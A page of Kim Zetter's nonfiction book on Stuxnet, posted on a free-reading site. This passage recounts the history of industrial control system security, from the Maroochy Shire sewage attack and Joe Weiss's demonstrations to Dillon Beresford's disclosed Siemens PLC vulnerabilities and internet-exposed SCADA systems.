Book Read Free

Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon

Page 17

by Kim Zetter


  The attacks continued on and off for weeks and reached a peak one night in March when more than two-dozen incidents occurred. Investigators finally concluded it must be a rogue insider sending malicious commands in the field via two-way radio signals.14 They zeroed in on a former contractor named Vitek Boden, a forty-nine-year-old engineer who had worked for Hunter WaterTech until his contract expired in December, around the time the first water pump failed. Boden had subsequently sought a full-time job with the water district but was turned down in January—which coincided with when the bulk of the problems began.

  Sure enough, when police caught up with Boden one night in April after alarm systems at four pump stations were disabled, they found a laptop in his car with Hunter WaterTech’s proprietary software installed and a two-way radio set to the nonpublic frequency the water district used to communicate with pumping stations. They also found an RTU Boden had apparently used to send out the bogus commands.15

  Boden’s case was the first cyberattack against a critical infrastructure system to come to light, but it likely wasn’t the first to occur. Others no doubt had simply gone undetected or unreported.16 In the wake of the Maroochy incident, workers from other utilities told investigators that they would never have pursued criminal charges against Boden as Maroochy had done, in order to keep the matter quiet.17

  The case should have been a wake-up call to control-system operators around the world, but many dismissed it because it involved an inside attacker who had extensive knowledge of the Maroochy Shire system and access to the specialized equipment needed to conduct the attack. No outsider could have done what Boden did, they argued, ignoring a number of security problems with Maroochy’s control-system network that outsiders could have exploited to achieve similar attacks. Peter Kingsley, one of the investigators on the case, later warned attendees at a control-system conference that although the Maroochy hack had been an inside job, breaches from outsiders were by no means impossible. “Some utilities believe they’re protected because they themselves can’t find an unauthorized way to access their systems,” he said. “But hackers don’t restrict themselves to ordinary techniques.”18

  Kingsley’s words seemed quaint in 2002 because there were still few signs that outsiders were interested in hacking critical infrastructure systems. And in the absence of any major disaster, the security of control systems simply wasn’t a concern.

  It was around this time that Joe Weiss became an evangelist for control-system security.

  Weiss is a lean and energetic sixty-four-year-old who works out of his home in Cupertino, California, the heart of Silicon Valley, and is used to thinking about catastrophic scenarios. He lives just five miles from California’s notorious San Andreas Fault and the seventy-year-old Stevens Creek Dam. When the Loma Prieta earthquake struck the area in 1989, chimneys toppled, streetlights and phones died for several days, and shockwaves in the swimming pool at nearby DeAnza College ejected polo players from the water and onto the pavement like beached seals.

  Weiss first became aware of the security problems with control systems in 1999. A nuclear engineer by training, he was working for the Electric Power Research Institute when the Y2K issue arose. Armageddon warnings in the press predicted dystopian meltdowns when computer clocks struck midnight on New Year’s Eve because of a programming error that failed to anticipate the millennial rollover to triple zeroes on January 1, 2000. Weiss began to wonder: if such a minor thing as a change of date could threaten to bring control systems to a halt, what would more serious issues do? More important, if Y2K could accidentally cause huge problems, what might an intentional attack from hackers do?

  Dozens of security conferences held around the world each year focused on general computer security, but none of them addressed control systems. So Weiss began attending them to learn what security guidelines the control-system community should adopt. But the more conferences he attended, the more worried he got. When network administrators talked about using encryption and authentication to prevent unauthorized users from accessing their systems, Weiss realized that control systems had none of the standard protections that normal computer networks used. When security experts asked him what brand of firewall control-system operators at energy plants used or how often they reviewed their network logs for evidence of intruders, Weiss had to reply, “We don’t have firewalls. No network logs, either.”19 And when he began to ask control-system makers about the security of their products, he got blank stares in response. They told him no one had ever asked about security before.

  Then two planes struck the Twin Towers in September 2001 and not long afterward, authorities uncovered suspicious patterns of searches on government websites in California. The searchers appeared to be exploring digital systems used to manage utilities and government offices in the San Francisco region. The activity, which appeared to originate from IP addresses in Saudi Arabia, Indonesia, and Pakistan, showed a particular interest in emergency phone systems, power and water plants, and gas facilities.20 Other searches focused on programming controls for fire-dispatch systems and pipelines.

  The following year, US forces in Kabul seized a computer in an al-Qaeda office and found models of a dam on it along with engineering software that could be used to simulate its failure.21 That same year, the CIA issued a Directorate of Intelligence Memorandum stating that al-Qaeda had “far more interest” in cyberterrorism than previously believed and had begun to contemplate hiring hackers.

  There were signs that others might be interested in US critical infrastructure too.22 In 2001, hackers broke into servers at the California Independent System Operator, or Cal-ISO, a nonprofit corporation that manages the transmission system for moving electricity throughout most of the state. The attackers got in through two unprotected servers and remained undetected for two weeks until workers noticed problems with their machines.23 Cal-ISO officials insisted the breach posed no threat to the grid, but unnamed sources told the Los Angeles Times that the hackers were caught just as they were trying to access “key parts of the system” that would have allowed them to cause serious disruptions in electrical service. One person called it a near “catastrophic breach.” The attack appeared to originate from China, and came in the midst of a tense political standoff between China and the United States after a US spy plane collided in midair with a Chinese fighter jet over the South China Sea.

  In response to growing concerns about critical infrastructure, and in particular the security of the nation’s power grids, the Department of Energy launched a National SCADA Test Bed program in 2003 at the Idaho National Lab (INL). The goal was to work with the makers of control systems to evaluate their equipment for security vulnerabilities, and was an initiative that ultimately led to the 2007 Aurora Generator Test.24

  There are 2,800 power plants in the United States and 300,000 sites producing oil and natural gas.25 Another 170,000 facilities form the public water system in the United States, which includes reservoirs, dams, wells, treatment facilities, pumping stations, and pipelines.26 But 85 percent of these and other critical infrastructure facilities are in the hands of the private sector, which means that aside from a few government-regulated industries—such as the nuclear power industry—the government can do little to force companies to secure their systems. The government, however, could at least try to convince the makers of control systems to improve the security of their products. Under the test-bed program, the government would conduct the tests as long as the vendors agreed to fix any vulnerabilities uncovered by them.27

  Around the same time, DHS also launched a site-assessment program through its Industrial Control System Cyber Emergency Response Team (ICS-CERT) to evaluate the security configuration of critical infrastructure equipment and networks already installed at facilities. Between 2002 and 2009, the team conducted more than 100 site assessments across multiple industries—oil and natural gas, chemical, and water—and found more than 38,000 vulnerabilities. These included critical systems that were ac
cessible over the internet, default vendor passwords that operators had never bothered to change or hard-coded passwords that couldn’t be changed, outdated software patches, and a lack of standard protections such as firewalls and intrusion-detection systems.

  But despite the best efforts of the test-bed and site-assessment researchers, they were battling decades of industry inertia—vendors took months and years to patch vulnerabilities that government researchers found in their systems, and owners of critical infrastructure were only willing to make cosmetic changes to their systems and networks, resisting more extensive ones.

  Weiss, who worked as a liaison with INL to help develop its test-bed program, got fed up with the inertia and launched a conference to educate critical-infrastructure operators about the dangerous security problems with their systems. In 2004, he resorted to scare tactics by demonstrating a remote attack to show them what could be done. The role of hacker was played by Jason Larsen, a researcher at INL, who demonstrated an attack against a substation in Idaho Falls from a computer at Sandia National Laboratory in New Mexico. Exploiting a recently discovered vulnerability in server software, Larsen bypassed several layers of firewalls to hack a PLC controlling the substation and release his payload in several stages. The first stage opened and closed a breaker. The second stage opened all of the breakers at once. The third stage opened all of the breakers but manipulated data sent to operator screens to make it appear that the breakers were closed.

  “I call it my ‘wet pants’ demo,” Weiss says. “It was a phenomenal success.”

  Weiss followed the demo a few years later with another one and then another, each time enlisting different security experts to demonstrate different modes of attack. The only problem was, they were ahead of their time. Each time engineers would leave his conference fired up with ideas about improving the security of their networks, they would run up against executives back home who balked at the cost of re-architecting and securing the systems. Why spend money on security, they argued, when none of their competitors were doing it and no one was attacking them?

  But what Weiss and the test lab couldn’t achieve in a decade, Stuxnet achieved in a matter of months. The digital weapon shone a public spotlight on serious vulnerabilities in the nation’s industrial control systems for the first time, and critical equipment that for so long had remained obscure and unknown to most of the world now caught the attention of researchers and hackers, forcing vendors and critical-infrastructure owners to finally take note as well.

  THE NEWS IN August 2010 that Stuxnet was sabotaging Siemens PLCs caught the interest of a twenty-five-year-old computer security researcher in Austin, Texas, named Dillon Beresford. Beresford, like most people, had never heard of PLCs and was curious to see how vulnerable they might be. So he bought several Siemens PLCs online and spent two months examining and testing them in the bedroom of his small apartment. It took just a few weeks to uncover multiple vulnerabilities that he could use in an attack.

  He discovered, for example, that none of the communication that passed between a programmer’s machine and the PLCs was encrypted, so any hacker who broke into the network could see and copy commands as they were transmitted to the PLCs, then later play them back to a PLC to control and stop it at will. This would not have been possible had the PLCs rejected unauthorized computers from sending them commands, but Beresford found that the PLCs were promiscuous computers that would talk to any machine that spoke their protocol language. They also didn’t require that commands sent to them be digitally signed with a certificate to prove that they came from a trustworthy source.

  Although there was an authentication packet, or password of sorts, that passed between a Step 7 machine and the PLC, Beresford was able to decode the password in less than three hours. He also found that he could simply capture the authentication packet as it passed from a Step 7 machine to the PLC and replay it in the same way he replayed commands, eliminating the need to decode the password at all. Once he had control of a PLC, he could also issue a command to change the password to lock out legitimate users.28

  Beresford found other vulnerabilities as well, including a back door that Siemens programmers had left in the firmware of their PLCs—firmware is the basic software that is resident on hardware devices to make them work. Vendors often place global, hard-coded passwords in their systems to access them remotely to provide troubleshooting for customers—like an OnStar feature for control systems. But backdoors that allow vendors to slip in also let attackers in.29 The username and password for opening the Siemens back door was the same for every system—“basisk”—and was hard-coded into the firmware for anyone who examined it to see. Using this back door, an attacker could delete files from the PLC, reprogram it, or issue commands to sabotage whatever operations the PLC controlled.30

  Beresford reported his findings to ICS-CERT, which worked with Siemens to get the vulnerabilities fixed. But not all of them could be. Some, like the transmission of unencrypted commands and the lack of strong authentication, were fundamental design issues, not programming bugs, which required Siemens to upgrade the firmware on its systems to fix them or, in some cases, re-architect them. And these weren’t just problems for Siemens PLCs; they were fundamental design issues that many control systems had, a legacy of their pre-internet days, when the devices were built for isolated networks and didn’t need to withstand attacks from outsiders.

  Beresford’s findings defied longstanding assertions by vendors and critical-infrastructure owners that their systems were secure because only someone with extensive knowledge of PLCs and experience working with the systems could attack them. With $20,000 worth of used equipment purchased online and two months working in his spare time, Beresford had found more than a dozen vulnerabilities and learned enough about the systems to compromise them.

  Since Beresford’s findings, other researchers have uncovered additional vulnerabilities in Siemens and other control systems. According to a database of control-system vulnerabilities managed by Wurldtech Security, a maker of systems for protecting critical infrastructure, about 1,000 vulnerabilities have been found in control systems and control-system protocols since 2008. Most of them would simply allow an attacker to prevent operators from monitoring their system, but many of them would also allow an attacker to hijack the system.31

  In 2011, a security firm hired by a Southern California utility to evaluate the security of controllers at its substations found multiple vulnerabilities that would allow an attacker to control its equipment. “We’ve never looked at a device like this before, and we were able to find this in the first day,” Kurt Stammberger, vice president of Mocana said. “These were big, major problems, and problems frankly that have been known about for at least a year and a half, but the utility had no clue.”32

  The security problems with control systems are exacerbated by the fact that the systems don’t get replaced for years and don’t get patched on a regular basis the way general computers do. The life-span of a standard desktop PC is three to five years, after which companies upgrade to new models. But the life-span of a control system can be two decades. And even when a system is replaced, new models have to communicate with legacy systems, so they often contain many of the same vulnerabilities as the old ones.

  As for patching, some control systems run on outdated versions of Windows that are no longer supported by Microsoft, meaning that if any new vulnerabilities are discovered in the software, they will never get patched by the vendor. But even when patches are available, patching is done infrequently on control systems because operators are wary of buggy patches that might crash their systems and because they can’t easily take critical systems—and the processes they control—out of service for the several hours it can take to install patches or do other security maintenance.33

  All of these problems are compounded by a growing trend among vendors to package safety systems with their control systems. Safety systems used to be hardwired analog systems configured separate
ly from control systems so that any problems with the control system wouldn’t interfere with the safety system’s ability to shut down equipment in an emergency. But many vendors are now building the safety system into their control system, making it easier to disable them both in a single attack.34

  Many of the vulnerabilities in control systems could be mitigated if the systems ran on standalone networks that were “air-gapped”—that is, never connected to the internet or connected to other systems that are connected to the internet. But this isn’t always the case.

  In 2012, a researcher in the UK found more than 10,000 control systems that were connected to the internet—including ones belonging to water-treatment and power plants, dams, bridges, and train stations—using a specialized search engine called Shodan that can locate devices like VoIP phones, SmartTVs, and control systems that are connected to the internet.35

  In 2011 a hacker named pr0f accessed the controls for a water plant in South Houston after finding the city’s Siemens control system online. Although the system was password-protected, it used a three-character password that was easily guessed. “I’m sorry this ain’t a tale of advanced persistent threats and stuff,” pr0f told a reporter at the time, “but frankly most compromises I’ve seen have been a result of gross stupidity, not incredible technical skill on the part of the attacker.”36 Once in the SCADA system, pr0f took screenshots showing the layout of water tanks and digital controls, though he didn’t sabotage the system. “I don’t really like mindless vandalism. It’s stupid and silly,” he wrote in a post he published online. “On the other hand, so is connecting interfaces to your SCADA machinery to the internet.”37

 

‹ Prev